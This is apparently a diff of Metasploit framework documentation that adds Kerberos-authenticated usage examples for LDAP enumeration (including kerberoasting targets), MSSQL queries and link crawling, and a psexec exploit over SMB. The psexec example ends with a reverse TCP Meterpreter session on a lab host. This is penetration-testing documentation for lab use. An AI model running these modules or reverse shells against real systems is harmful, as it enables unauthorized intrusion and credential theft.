+- `ENUM_USER_PASSWORD_NOT_REQUIRED` - Dump info about all users whose password never expires and whose account is still enabled.
+- `ENUM_USER_SPNS_KERBEROAST` - Dump info about all user objects with Service Principal Names (SPNs) for kerberoasting.
+
+### Kerberos Authentication
+
+Details on the Kerberos specific option names are documented in [[Kerberos Service Authentication|kerberos/service_authentication]]
+
+Query LDAP for accounts:
+
+```msf
+msf6 > use auxiliary/gather/ldap_query
+msf6 auxiliary(gather/ldap_query) > run action=ENUM_ACCOUNTS rhost=192.168.123.13 username=Administrator password=p4$$w0rd ldap::auth=kerberos ldap::rhostname=dc3.demo.local domain=demo.local domaincontrollerrhost=192.168.123.13
+[*] Running module against 192.168.123.13
+
+[+] 192.168.123.13:88 - Received a valid TGT-Response
+[*] 192.168.123.13:389 - TGT MIT Credential Cache ticket saved to /Users/user/.msf4/loot/20230118120714_default_192.168.123.13_mit.kerberos.cca_216797.bin
+[+] 192.168.123.13:88 - Received a valid TGS-Response
+[*] 192.168.123.13:389 - TGS MIT Credential Cache ticket saved to /Users/user/.msf4/loot/20230118120714_default_192.168.123.13_mit.kerberos.cca_638903.bin
+[+] 192.168.123.13:88 - Received a valid delegation TGS-Response
+[*] Discovering base DN automatically
+[+] 192.168.123.13:389 Discovered base DN: DC=domain,DC=local
+CN=Administrator CN=Users DC=domain DC=local
+============================================
+
+ Name                Attributes
+ ----                ----------
+ badpwdcount         0
+ pwdlastset          133184302034979121
+ samaccountname      Administrator
+ useraccountcontrol  512
+ ... etc ...
+```
@@ -0,0 +1,61 @@
+## MSSQL Workflows
+
+Microsoft SQL Server (MSSQL) is a relational database management system. Commonly used in conjunction with web applications
+and other software that need to persist data. MSSQL is a useful target for data extraction and code execution.
+
+MySQL is frequently found on port on the following ports:
+
+- 1433/TCP
+- 1434/UDP
+
+### Lab Environment
+
+Environment setup:
+
+- Either follow [Microsoft's SQL Server installation guide](https://learn.microsoft.com/en-us/sql/database-engine/install-windows/install-sql-server?view=sql-server-ver16) or use chocolatey package manager 
+- Enable TCP access within the SQL Server Configuration Manager
+- Optional: [Microsoft's sqlcmd utility](https://docs.microsoft.com/en-us/sql/tools/sqlcmd-utility?view=sql-server-ver16) can be installed separately for querying the database from your host machine
+- Optional: [Configure Windows firewall](https://learn.microsoft.com/en-us/sql/sql-server/install/configure-the-windows-firewall-to-allow-sql-server-access?view=sql-server-ver16) to allow MSSQL server access 
+
+### MSSQL Enumeration
+
+### Running queries
+
+```
+use auxiliary/admin/mssql/mssql_sql
+run rhost=192.168.123.13 username=administrator password=p4$$w0rd sql='select auth_scheme from sys.dm_exec_connections where session_id=@@spid'
+```
+
+### Link crawling
+
+Identify if the SQL server has been configured with trusted links, which allows running queries on other MSSQL instances:
+
+```
+use windows/mssql/mssql_linkcrawler
+run rhost=192.168.123.13 username=administrator password=p4$$w0rd
+```
+
+### Kerberos Authentication
+
+Details on the Kerberos specific option names are documented in [[Kerberos Service Authentication|kerberos/service_authentication]]
+
+Connect to a Microsoft SQL Server instance and run a query:
+
+```msf
+msf6 > use auxiliary/admin/mssql/mssql_sql
+msf6 auxiliary(admin/mssql/mssql_sql) > run 192.168.123.13 domaincontrollerrhost=192.168.123.13 username=administrator password=p4$$w0rd mssql::auth=kerberos mssql::rhostname=dc3.demo.local mssqldomain=demo.local sql='select auth_scheme from sys.dm_exec_connections where session_id=@@spid'
+[*] Reloading module...
+[*] Running module against 192.168.123.13
+
+[*] 192.168.123.13:1433 - 192.168.123.13:88 - Valid TGT-Response
+[+] 192.168.123.13:1433 - 192.168.123.13:88 - Valid TGS-Response
+[*] 192.168.123.13:1433 - 192.168.123.13:88 - TGS MIT Credential Cache saved to ~/.msf4/loot/20220630193907_default_192.168.123.13_windows.kerberos_556101.bin
+[*] 192.168.123.13:1433 - SQL Query: select auth_scheme from sys.dm_exec_connections where session_id=@@spid
+[*] 192.168.123.13:1433 - Row Count: 1 (Status: 16 Command: 193)
+
+ auth_scheme
+ -----------
+ KERBEROS
+
+[*] Auxiliary module execution completed
+```
@@ -13,7 +13,7 @@ Metasploit has support for multiple MySQL modules, including:

 There are more modules than listed here, for the full list of modules run the `search` command within msfconsole:

-```
+```msf
 msf6 > search mysql
 ```

@@ -6,7 +6,7 @@ Metasploit post modules replace old Meterpreter scripts, which are no longer mai

 You can search for post gather modules within msfconsole:

-```
+```msf
 msf6 > search type:post platform:windows name:gather

 Matching Modules
@@ -25,7 +25,7 @@ There are two ways to launch a Post module, both require an existing session.

 Within a msf prompt you can use the `use` comand followed by the `run` command to execute the module against the required session. For instance to extract credentials from Chrome on the most recently opened Metasploit session:

-```
+```msf
 msf6 > use post/windows/gather/enum_chrome
 msf6 post(windows/gather/enum_chrome) > run session=-1 verbose=true

@@ -49,7 +49,7 @@ msf6 post(windows/gather/enum_chrome) >

 Or within a Meterpreter prompt use the `run` command, which will automatically set the module's session value:

-```
+```msf
 msf6 > sessions --interact -1
 [*] Starting interaction with 5...

@@ -13,7 +13,7 @@ Metasploit has support for multiple PostgreSQL modules, including:

 There are more modules than listed here, for the full list of modules run the `search` command within msfconsole:

-```
+```msf
 msf6 > search postgres
 ```

@@ -97,7 +97,7 @@ psql postgres://postgres:mysecretpassword@localhost:5432

 Metasploit's output will be:

-```
+```msf
 msf6 auxiliary(server/capture/postgresql) >
 [*] Started service listener on 0.0.0.0:5432
 [*] Server started.
@@ -23,7 +23,7 @@ Metasploit has support for multiple SMB modules, including:

 There are more modules than listed here, for the full list of modules run the `search` command within msfconsole:

-```
+```msf
 msf6 > search mysql
 ```

@@ -185,3 +185,30 @@ use auxiliary/admin/smb/upload_file
 echo "my file" > local_file.txt
 run smb://a:p4$$w0rd@192.168.123.13/my_share/remote_file.txt lpath=./local_file.txt
 ```
+
+### Kerberos Authentication
+
+Details on the Kerberos specific option names are documented in [[Kerberos Service Authentication|kerberos/service_authentication]]
+
+Running psexec against a host:
+
+```msf
+msf6 > use exploit/windows/smb/psexec
+msf6 exploit(windows/smb/psexec) > run rhost=192.168.123.13 username=Administrator password=p4$$w0rd smb::auth=kerberos domaincontrollerrhost=192.168.123.13 smb::rhostname=dc3.demo.local domain=demo.local
+
+[*] Started reverse TCP handler on 192.168.123.1:4444
+[*] 192.168.123.13:445 - Connecting to the server...
+[*] 192.168.123.13:445 - Authenticating to 192.168.123.13:445|demo.local as user 'Administrator'...
+[+] 192.168.123.13:445 - 192.168.123.13:88 - Received a valid TGT-Response
+[*] 192.168.123.13:445 - 192.168.123.13:445 - TGT MIT Credential Cache ticket saved to /Users/user/.msf4/loot/20230118120911_default_192.168.123.13_mit.kerberos.cca_474531.bin
+[+] 192.168.123.13:445 - 192.168.123.13:88 - Received a valid TGS-Response
+[*] 192.168.123.13:445 - 192.168.123.13:445 - TGS MIT Credential Cache ticket saved to /Users/user/.msf4/loot/20230118120911_default_192.168.123.13_mit.kerberos.cca_169149.bin
+[+] 192.168.123.13:445 - 192.168.123.13:88 - Received a valid delegation TGS-Response
+[*] 192.168.123.13:445 - Selecting PowerShell target
+[*] 192.168.123.13:445 - Executing the payload...
+[+] 192.168.123.13:445 - Service start timed out, OK if running a command or non-service executable...
+[*] Sending stage (175686 bytes) to 192.168.123.13
+[*] Meterpreter session 6 opened (192.168.123.1:4444 -> 192.168.123.13:49738) at 2023-01-18 12:09:13 +0000
+
+meterpreter >
+```
--- a/Show More
+++ b/Show More